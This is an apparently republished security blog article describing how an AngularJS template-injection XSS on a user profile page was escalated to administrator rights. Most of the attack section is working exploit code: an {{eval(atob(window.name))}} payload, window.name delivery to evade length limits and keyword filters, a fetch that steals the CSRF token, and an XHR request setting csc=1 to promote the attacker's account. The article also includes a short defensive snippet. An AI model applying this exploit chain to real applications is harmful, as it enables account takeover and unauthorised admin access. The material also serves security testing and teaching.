How to Use AngularJS-Based XSS to Escalate Privileges

2025-01-19 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)05/31 Report--

This article explains in detail how AngularJS-based XSS can be used to escalate privileges. The editor shares it here as a reference, in the hope that you will have a better understanding of the topic after reading it.

XSS is a very interesting vulnerability: once you find one, you can interact directly with the application without worrying about the same-origin policy. Everything is under our control, and most of the protections are broken.

The administrator user has the highest privileges in the application and can add, remove, or edit any user. It was through XSS that I was finally able to escalate to administrator privileges. Whenever I find XSS, I try to exploit it in some unique way. Token grabbing, bypassing CSRF protection, or grabbing cookies now seems a bit out of date.

During my testing, I found several XSS vulnerabilities on the user profile page. Each registered user has a different profile page, such as "https://www.site.com/users/username-here".

Discover AngularJS-based XSS:

This is a page that all privileged users can access, and it contains the user's account name and last name. Apply simple test probes, such as ">

No results were displayed, which indicates that the application is properly protected against XSS. All the special characters are filtered correctly, which led me to another thought: why not try AngularJS-based XSS? Go to "settings" and change the account name to "{{alert(1)}}".

So I tested the same thing as a different privileged user and navigated to my profile at /users/username_page (accessible to any user) to trigger the payload.
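Why correct HTML filtering did not stop the payload above, shown from the defender's side as an added example (not code from the original article). The function names are hypothetical, and it assumes the page is compiled by AngularJS with the default {{ }} delimiters:

```javascript
'use strict';
// Added example, not code from the article. All function names are hypothetical.
// Assumption: the page is compiled by AngularJS with the default {{ }} delimiters.

// Standard HTML output encoding: neutralizes tag and attribute injection.
function htmlEscape(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Weak rendering: encoded correctly for HTML, yet {{ }} reaches the DOM
// untouched and AngularJS evaluates it as an expression.
function renderProfileWeak(name) {
  return `<h1>${htmlEscape(name)}</h1>`;
}

// Hardened rendering: ng-non-bindable tells AngularJS not to compile or
// interpolate the contents of this element.
function renderProfileHardened(name) {
  return `<h1 ng-non-bindable>${htmlEscape(name)}</h1>`;
}

// Input-side check: flag either delimiter on its own, because two fields
// rendered side by side (account name + last name) can form a pair together.
function hasAngularDelimiter(value) {
  return /\{\{|\}\}/.test(String(value));
}

// Constructed sample inputs for illustration.
const samples = ['Mrs. Camylle Kertzmaz', '"><b>x</b>', '{{alert(1)}}', 'first {{', 'last }}'];
for (const s of samples) {
  console.log(JSON.stringify(s), '->', renderProfileWeak(s),
    hasAngularDelimiter(s) ? '[REJECT: template delimiter]' : '[ok]');
}
```

The more robust design is to keep user-controlled data out of any markup that AngularJS compiles; the check and the directive above are the per-field fallback.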

When trying to escalate privileges, your main goal is to find features that can edit your role or invite you into restricted areas. In my example, the administrator user has the right to edit and add users.

In my example, I had a test administrator account for testing these issues, so I knew which requests needed to be replicated to add a new user with administrator privileges. Without such access, you can try to obtain the source of the administrative account's pages by sending back the output of document.body.innerHTML, and use it to learn about the internal functions. Tools such as XSSHunter can collect this kind of information.

How to deliver the payload?

The length limit of the username field is so short that the entire exploit code cannot be written in this field. The username is also shown as an entry on the profile page, where a long payload would appear malicious. Because of the same length limit, script tags that reference external JavaScript cannot be injected either.

As usual, I deliver the payload through window.name. I always deliver the payload through window.name because it has no exploitation restrictions, and the payload that loads our exploit code is limited to 20 characters, because we only load the given payload and pass it to eval(atob(top.name)). Another benefit of this technique is that it bypasses many validation checks for malicious keywords, because our main exploit code is never entered into the vulnerable application. In short, our attack code is never validated or checked.

The window name can be set by opening a URL with window.open(url, "window name here"), and we set the exploit code as base64. So calling window.name returns our exploit code, which is then executed by eval().

Locate the user modification function:

This feature is found in the administrative user portal, where the most privileged user can arbitrarily change the data and permissions of any user in the application. There are different options, such as changing the e-mail address and a check box confirming that the user has higher permissions. Setting the parameter "csc=1" grants the user full permissions, but this operation can only be performed by the administrator user. If you have only retrieved the source code, you can review it to see which endpoints take which parameters and map out all the functions.

The following is the request to change the user to an administrator and a fully privileged user:

    POST /users/attackers-username HTTP/1.1
    Host: vulnerablesite.com
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 141

    _method=PUT&_token=CSRF_TOKEN_HERE&name=USERNAME&email=USER_EMAIL&phone=&csc=1

In order to escalate our privileges, we should reproduce the above request so that when a higher-privileged user loads our exploit code, our user is modified.

Write exploit code:

The first thing we need to retrieve is the CSRF token so that the request validates. Sometimes it appears in a cookie, so it is easy to retrieve from document.cookie, but in this case it was found in a meta tag:

I use fetch() to open the settings page at /settings and store its output in the variable woot. Then I use woot.getElementsByTagName('meta')[3]['content'] to retrieve the value of the CSRF token and store it in the new variable csrf_token. Now our exploit code is as follows:

    var woot = document.createElement('html');
    fetch('https://vulnerablesite.com/settings', {credentials: 'include'})
      .then((resp) => resp.text())
      .then(function (data) {
        // Parse the settings page and read the CSRF token from its meta tag
        woot.innerHTML = data;
        var csrf_token = woot.getElementsByTagName('meta')[3]['content'];
      });

Now we will use XHR to reproduce the request:

    function privilege_escalate() {
      var req = new XMLHttpRequest();
      req.open('POST', 'https://vulnerablesite.com/users/mrs-camylle-kertzmazevalwindowname', true);
      req.withCredentials = true;
      req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
      req.send('_method=PUT&_token=' + csrf_token + '&name=Mrs.+Camylle+Kertzmaz%7B%7Beval%28window.name%29%7D%7D&email=user%40example.org&phone=&csc=1');
    }

The above privilege_escalate() function, when executed, sends a POST request that changes the information of the attacker account (in my case, mrs-camylle-kertzmazevalwindowname) and sets the name to the payload {{eval(atob(window.name))}}, which keeps the payload in the name, so whenever window.name holds exploit code, that code is executed from window.name. In addition, csc=1 in the request changes the user's permissions.

The final exploit code:

    // XSS Exploit code for Privilege Escalation
    // Author: Shawar Khan
    var woot = document.createElement('html');
    fetch('https://vulnerablesite.com/settings', {credentials: 'include'})
      .then((resp) => resp.text())
      .then(function (data) {
        woot.innerHTML = data;
        var csrf_token = woot.getElementsByTagName('meta')[3]['content'];
        privilege_escalate();

        function privilege_escalate() {
          var req = new XMLHttpRequest();
          req.open('POST', 'https://vulnerablesite.com/users/mrs-camylle-kertzmazevalwindowname', true);
          req.withCredentials = true;
          req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
          req.send('_method=PUT&_token=' + csrf_token + '&name=Mrs.+Camylle+Kertzmaz%7B%7Beval%28window.name%29%7D%7D&email=user%40example.org&phone=&csc=1');
        }
      });

The exploit code can be further base64 encoded and used as a window name, so it will be triggered when eval (atob (window.name)) executes the code. We can now use the following code to open our profile page and set our exploit code to window name. In this way, once window.name is accessed, our exploit code will be triggered:

    // Second argument: the base64-encoded exploit code, used as the window name
    window.open('https://vulnerablesite.com/users/mrs-camylle-kertzmazevalwindowname', 'BASE64_ENCODED_EXPLOIT_CODE_HERE');

In the screenshot below, we can see that the functions that our users can access are limited:

After the highly privileged user successfully executed the exploit code, our account had the highest privileges and access to administrative functions. As shown in the following figure:

Whenever you test for XSS vulnerabilities, don't give up just because the application correctly filters user input. Go further and try other techniques to achieve a working XSS, such as the AngularJS-based XSS described in this article. Try {{alert(1)}}, or try uploading .swf, .svg, .html, .url files, and so on.

Never stop at detecting a vulnerability; always try to understand its limitations and scope. When dealing with XSS, try to interact with unique features rather than just showing a pop-up window.
